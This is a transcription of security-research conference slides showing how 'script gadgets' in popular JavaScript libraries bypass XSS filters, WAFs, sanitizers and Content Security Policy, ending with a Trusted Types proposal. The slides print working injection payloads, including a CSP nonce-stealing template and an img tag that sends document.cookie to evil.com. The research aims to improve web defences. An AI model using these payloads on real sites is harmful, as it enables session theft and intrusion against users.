Code-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets

Similar documents
We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries

Trusted Types - W3C TPAC

So we broke all CSPs. You won't guess what happened next!

BOOSTING THE SECURITY

BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION

Your Scripts in My Page: What Could Possibly Go Wrong? Sebastian Lekies / Ben Stock Martin Johns

Web Security: Vulnerabilities & Attacks

CSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum

Web Security IV: Cross-Site Attacks

Content Security Policy

Extending the browser to secure applications

Defense-in-depth techniques. for modern web applications

25 Million Flows Later Large-scale Detection of DOM-based XSS. CCS 2013, Berlin Sebastian Lekies, Ben Stock, Martin Johns

Content Security Policy

CS 161 Computer Security

Synode: Understanding and Automatically Preventing Injection Attacks on Node.js

Browser code isolation

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

HTTP Security Headers Explained

CS 161 Computer Security

Code-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Client Side Security And Testing Tools

Web basics: HTTP cookies

Web basics: HTTP cookies

C1: Define Security Requirements

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

last time: command injection

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

RKN 2015 Application Layer Short Summary

Some Facts Web 2.0/Ajax Security

Web Security: Vulnerabilities & Attacks

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

WEB SECURITY: XSS & CSRF

Client Side Injection on Web Applications

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

CSC 405 Computer Security. Web Security

AN EVALUATION OF THE GOOGLE CHROME EXTENSION SECURITY ARCHITECTURE

CIS 4360 Secure Computer Systems XSS

Chrome Extension Security Architecture

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

MODERN WEB APPLICATION DEFENSES

Riding out DOMsday: Toward Detecting and Preventing DOM Cross-Site Scripting. William Melicher Anupam Das Mahmood Sharif Lujo Bauer Limin Jia

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

High Performance Single Page Application with Vue.js

The security of Mozilla Firefox s Extensions. Kristjan Krips

Protecting users against XSS-based password manager abuse. AsiaCCS 2014, Kyoto Ben Stock, Martin Johns

Templates and Databinding. SWE 432, Fall 2017 Design and Implementation of Software for the Web

High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018

Robust Defenses for Cross-Site Request Forgery

HTML5: Something wicked this way comes. Krzysztof Kotowicz Securing

XSSFor the win! What can be really done with Cross-Site Scripting.

Application vulnerabilities and defences

EasyCrypt passes an independent security audit

CSCE 548 Building Secure Software SQL Injection Attack

Web security: an introduction to attack techniques and defense methods

INJECTING SECURITY INTO WEB APPS WITH RUNTIME PATCHING AND CONTEXT LEARNING

Web Security, Part 2

Attacks on Clients: JavaScript & XSS

ESORICS September Martin Johns

Understanding and Automatically Preventing Injection Attacks on Node.js

The Hacker s Guide to XSS

The course is supplemented by numerous hands-on labs that help attendees reinforce their theoretical knowledge of the learned material.

An Evaluation of the Google Chrome Extension Security Architecture

Web Application Security

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Hybrid App Security Attack and Defense

tostatichtml() for Everyone!

Web 2.0 Attacks Explained

Client-Side XSS Filtering in Firefox

Getting Started with

Bypassing Web Application Firewalls

Match the attack to its description:

The DOM and jquery functions and selectors. Lesson 3

Exploiting and Defending: Common Web Application Vulnerabilities

TechWatch Report Javascript Libraries and Frameworks

Know Your Own Risks: Content Security Policy Report Aggregation and Analysis

Xilara: An XSS Filter Based on HTML Template Restoration

Backbone.js in a Php Environment

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Single Page Applications using AngularJS

Writing Secure Chrome Apps and Extensions

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

Code Injection Attacks

Web Application Attacks

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

John Coggeshall Copyright 2006, Zend Technologies Inc.

Web Development for Dinosaurs An Introduction to Modern Web Development

Web Security, Summer Term 2012

Application Design and Development: October 30

OWASP AppSec Research The OWASP Foundation New Insights into Clickjacking

Web Security, Summer Term 2012

Eliminating XSS: Context-Sensitive Auto-Sanitization in PHP

Automated Generation of Event-Oriented Exploits in Android Hybrid Apps

Advance Mobile& Web Application development using Angular and Native Script

Transcription:

Code-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets Sebastian Lekies (@slekies) Krzysztof Kotowicz (@kkotowicz) Eduardo Vela Nava (@sirdarckcat)

Agenda 1. 2. 3. 4. 5. 6. Introduction to XSS and XSS mitigations What are Script Gadgets? Script Gadgets in popular JavaScript libraries Script Gadgets in real world applications Fixing (DOM) XSS in the Web plattform Summary & Conclusion

Introduction

Cross-Site-Scripting (XSS) primer XSS is a JavaScript injection vulnerability. <?php echo "<h1>hello ". $_GET['username']. "</h1>";?> username=sebastian username=<script> alert(1)</script>

Isn't XSS a solved problem? Google VRP Rewards

How do mitigations work? NoScript Filter www.website.com/xss.php?inj=<xss></xss> IE/Chrome Filter Warning! <XSS></XSS> GET /xss.php?inj=<xss></xss> REMOVE SCRIPT Warning! <XSS></XSS> REMOVE SCRIPT or BLOCK REQUEST WAF/ModSecurity CSP <XSS></XSS> Sanitizers Is <XSS></XSS> allowed? No REMOVE Is <XSS></XSS> allowed? No BLOCK Warning! <XSS></XSS> BLOCK REQUEST

Mitigations assume that blocking/removing dangerous tags & attributes stops XSS. Is this true when building an application with a modern JS framework?

Modern Applications - Example <div data-role="button" data-text="i am a button"></div> <script> var buttons = $("[data-role=button]"); buttons.html(buttons.attr("data-text")); </script> <div data-role="button" >I am a button</div> Any security issues in this code? Script Gadget

What are Script Gadgets? XSS BEGINS HERE <div data-role="button" data-text="<script>alert(1)</script>"></div> XSS ENDS HERE <div data-role="button" data-text="i am a button"></div> <script> var buttons = $("[data-role=button]"); buttons.html(buttons.attr("data-text")); </script> <div data-role="button" ><script>alert(1)</script></div> Script Gadget

A Script Gadget is a piece of legitimate JavaScript code that can be triggered via an HTML injection and that upgrades otherwise benign HTML code to code execution.

Attacker model XSS Mitigation HTML XSS flaw DOM Script Gadgets Payload execution

Script Gadgets in popular JavaScript libraries

Research Questions 1. How common are gadgets in modern JS libraries? 2. How effective are gadgets in bypassing XSS mitigations?

Methodology We took 16 popular modern JS libraries: AngularJS 1.x, Aurelia, Bootstrap, Closure, Dojo Toolkit, Emberjs, Knockout, Polymer 1.x, Ractive, React, RequireJS, Underscore / Backbone, Vue.js, jquery, jquery Mobile, jquery UI For each library, we tried to manually find Script Gadgets that bypass each of the mitigations: XSS filters, HTML Sanitizers, WAFs, Content Security Policy

Bypassing WAFs & XSS filters WAFs & XSS filters detect attack patterns in request parameters, e.g. using regular expressions. Gadgets can bypass WAFs/XSS filters because... Often they allow for encoding the payload Some gadgets pass the code to eval() No <script>, onerror etc. has to be present

Bypassing WAFs & XSS filters Example: This HTML snippet: <div data-bind="value:'hello world'"></div> triggers the following code in Knockout: return node.getattribute("data-bind"); var rewrittenbindings = ko.expressionrewriting.preprocessbindings(bindingsstring, options), functionbody = "with($context){with($data {}){return{" + rewrittenbindings + "}}}"; return new Function("$context", "$element", functionbody); return bindingfunction(bindingcontext, node);

Bypassing WAFs & XSS filters These blocks create a gadget in Knockout that eval()s an attribute value. data-bind="value: foo" Gadget eval("foo") To XSS a web site with Knockout & XSS filter/waf, inject <div data-bind="value: alert(1)"></div>

Bypassing WAFs & XSS filters Encoding the payload in Bootstrap: <div data-toggle=tooltip data-html=true title='<script>alert(1)</script>'></div> Leveraging eval in Dojo: <div data-dojo-type="dijit/declaration" data-dojo-props="}-alert(1)-{">

Bypassing WAFs & XSS filters Gadgets bypassing WAFs & XSS Filters: XSS Filters WAFs Chrome Edge NoScript ModSecurity CRS 13 /16 9 /16 9 /16 9 /16 https://github.com/google/security-research-pocs

Bypassing HTML sanitizers HTML sanitizers remove known-bad and unknown HTML elements and attributes. <script>, onerror etc. Some sanitizers allow data- attributes. Gadgets can bypass HTML sanitizers because: JS code can be present in benign attributes (id, title) Gadgets leverage data-* attributes a lot

Bypassing HTML sanitizers Examples: Ajaxify, Bootstrap <div class="document-script">alert(1)</div> <div data-toggle=tooltip data-html=true title='<script>alert(1)</script>'>

Bypassing HTML sanitizers Gadgets bypassing HTML sanitizers: HTML sanitizers DOMPurify Closure 9 /16 6 /16 https://github.com/google/security-research-pocs

Bypassing Content Security Policy Content Security Policy identifies trusted and injected scripts. CSP stops the execution of injected scripts only. Depending on the CSP mode, trusted scripts: Are loaded from a whitelist of origins, Are annotated with a secret nonce value To make CSP easier to adopt, some keywords relax it in a certain way.

Bypassing Content CSP unsafe-eval Security Policy unsafe-eval: Trusted scripts can call eval(). Gadgets can bypass CSP w/unsafe-eval...because a lot of gadgets use eval(). Example: Underscore templates <div type=underscore/template> <% alert(1) %> </div>

Bypassing CSP strict-dynamic strict-dynamic: Trusted scripts can create new (trusted) script elements. Gadgets can bypass CSP w/strict-dynamic. Creating new script elements is a common pattern in JS libraries. Example: jquery Mobile <div data-role=popup id='--><script>"use strict" alert(1)</script>' ></div>

Bypassing Content Security Policy Whitelist / nonce-based CSP was the most difficult target. We couldn t use gadgets ending in innerhtml / eval() We couldn t add new script elements We bypassed such CSP with gadgets in expression parsers. Bonus: Such gadgets were successful in bypassing all the mitigations.

Gadgets in expression parsers Aurelia, Angular, Polymer, Ractive, Vue ship expression parsers. Example: Aurelia - property setters / getters / traversals, function calls <td> <button foo.call="sayhello()"> ${customer.name} </td> Say Hello! </button> AccessMember.prototype.evaluate = CallMember.prototype.evaluate = function(...) { //... function(...) { //... return /* *./ instance[this.name]; }; return func.apply(instance, args); };

Gadgets in expression parsers Aurelia's expression language supports arbitrary programs. The following payload calls alert(). <div ref=foo s.bind="$this.foo.ownerdocument.defaultview.alert(1)"> </div> <div> document window This payload bypasses all tested mitigations.

Gadgets in expression parsers Example: A JavaScriptless cookie stealer: <img src="http://evil.com/?cookie={{@global.document.cookie}}"> No JavaScript required!

Gadgets in expression parsers Sometimes, we can even construct CSP nonce exfiltration & reuse: Example: Stealing CSP nonces via Ractive <script id="template" type="text/ractive"> <iframe srcdoc=" <script nonce={{@global.document.currentscript.nonce}}> alert(1337) </{{}}script>"> </iframe> </script>

Bypassing Content Security Policy Gadgets bypassing unsafe-eval and script-dynamic CSP are common in tested JS libraries. A few libraries contain gadgets bypassing nonce/whitelist CSP. Content Security Policy whitelists nonces unsafe-eval strict-dynamic 3 /16 4 /16 10 /16 13 /16 https://github.com/google/security-research-pocs

Gadgets in libraries - summary Gadgets are prevalent and successful in bypassing XSS mitigations Bypasses in 53.13% of the library/mitigation pairs Every tested mitigation was bypassed at least once Almost all libraries have gadgets. Exceptions: React (no gadgets), EmberJS (gadgets only in development version) Gadgets in expression parsers are the most powerful XSSes in Aurelia, AngularJS (1.x), Polymer (1.x) can bypass all mitigations. https://github.com/google/security-research-pocs

Empirical Study Done in collaboration with Samuel Groß and Martin Johns from SAP

Research Questions 1. How common are gadgets in real-world Web sites? 2. How effective are gadgets in bypassing XSS mitigations?

Script Gadgets in user land code #mydiv["data-text"] -> elem.innerhtml <script> elem.innerhtml = $('#mydiv').attr('data-text'); </script> Exploit generator <xss></xss> <div id="mydiv" data-text="<svg/onload=xssgadget()>">

Results: Gadget prevalence Gadget-related data flows are present on 82 % of all sites 285,894 verified gadgets on 906 domains (19,88 %) Detection & verification is very conservative Verified gadgets represent a lower bound The real number is likely much higher

Gadgets effectiveness - user land code Gadgets are an effective mitigation bypass vector: We tested the default settings of HTML sanitizers 60% of web sites contain sensitive flows from data- attributes Eval-based data flows are present on 48% of all Web sites Bypasses XSS filters, WAFs & CSP unsafe-eval CSP strict-dynamic can potentially be bypassed in 73 % of all sites

Fixing XSS in the Web plattform

Root Cause Analysis Vulnerabilities are technology dependent (DOM) XSS is enabled by the Web platform itself DOM XSS is extremely easy to introduce DOM XSS is extremely hard to find DOM XSS is the most severe client-side vulnerability The Web platform and the DOM haven't changed in 25+ years In the long term, we are only able to address XSS if we change the Web platform

https://github.com/wicg/trusted-types

Example Replace string-based APIs with typed APIs via an opt-in flag: TrustedHtml, TrustedUrl, TrustedResourceUrl, TrustedJavaScript Trusted types can only be created in a secure manner Secure builders, sanitizers, constant string literals, etc. <body> <div id=foo></div> <script> var foo = document.queryselector('#foo'); var oktouse = TrustedHTML.sanitize('<b>I trust thee</b>'); foo.innerhtml = oktouse; foo.innerhtml = "user-input as string"; // throws an exception </script> </body>

Challenges Backwards Compatibility Chrome implementation is accompanied by a polyfill Enable unsafe conversions in a secure manner In edge cases apps need to bless seemingly untrusted strings. Solution: make unsafe conversions auditable and enforceable. Trade-off: Perfect Security vs. Perfect Usability

Call to arms Are you a JavaScript library/framework developer? Or do you want to contribute to an exciting new Web platform feature? Do you care about security? Approach us today or via mail or twitter

Summary & Conclusion

Summary XSS mitigations work by blocking attacks Focus is on potentially malicious tags / attributes Most tags and attributes are considered benign Gadgets can be used to bypass mitigations Gadgets turn benign attributes or tags into JS code Gadgets can be triggered via HTML injection Gadgets are prevalent in most modern JS libraries They break various XSS mitigations Already known vectors at https://github.com/google/security-research-pocs Gadgets exist in userland code of many websites

Summary The Web platform hasn't changed in 25 years We do not address the root causes of vulnerabilities The Web platform is not secure-by-default The Web platform needs to be secure-by-default Trusted Types prevent developers from shooting in their feet Security is made explicit and insecurity requires effort

Thank You!

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback